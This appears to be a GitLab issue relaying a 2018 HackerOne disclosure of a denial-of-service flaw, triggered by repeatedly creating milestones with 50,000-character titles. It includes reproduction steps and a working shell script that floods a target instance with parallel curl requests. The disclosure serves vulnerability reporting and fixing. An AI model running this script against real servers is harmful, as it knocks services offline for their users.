DoS with Markdown rendering long lines
This issue describes multiple H1 reports, which you can see in the related issues. All will probably have the same fix and so I've closed the others, but we should check all of the cases in our testing.
Link: https://hackerone.com/reports/415988
By: @8ayac
Details:
Description
An attacker can cause DoS by continuously sending a request to create a new Milestone with a title of 50000 characters in length.
Steps To Reproduce:
- Sign in to GitLab.
- Create a project.
- Go to "http(s)://{GitLab Host}/{userid}/{Project Name}/milestones/new".
- Fill out "Title" form with 'A'.
- Click "Create milestone" button.
- Intercept the request.
- Change the value of parameter "title" to 'A'*50000.
- Send the request.
- Repeat request of step 8. many times.
Result: Can not access to GitLab service. (I confirmed that the CPU usage rate of the server had risen to over 90%.)
You can reproduce easily by using the following script. (Replace [PLACEHOLDER]
with yours.)
#!/bin/sh
gitlabHost=$1
projectURL=$2
charBlock=$(head -c 50000 /dev/zero | sed -e 's/\x00/A/g')
curl=`cat << EOS
curl
--silent
--output /dev/null
${projectURL}/milestones
--header 'Host: ${gitlabHost}'
-b '_gitlab_session=[PLACEHOLDER]'
--data-binary 'utf8=%E2%9C%93&authenticity_token=[PLACEHOLDER]&milestone%5Btitle%5D=${charBlock}&milestone%5Bdescription%5D=&milestone%5Bstart_date%5D=&milestone%5Bdue_date%5D='
EOS`
for i in `seq $3`
do
eval ${curl}&
done
Impact
Users will not be able to use the entire service.
Thanks.
Timeline: 2018-09-28 22:41:00 +0000: @8ayac (report title updated)
2018-09-28 22:44:30 +0000: @8ayac (comment) Usage of the script:
$ ./poc.sh [GitLab Host] [URL of target project] [Repeat count of request]
dev.gitlab.org issue: https://dev.gitlab.org/gitlab/gitlabhq/issues/2766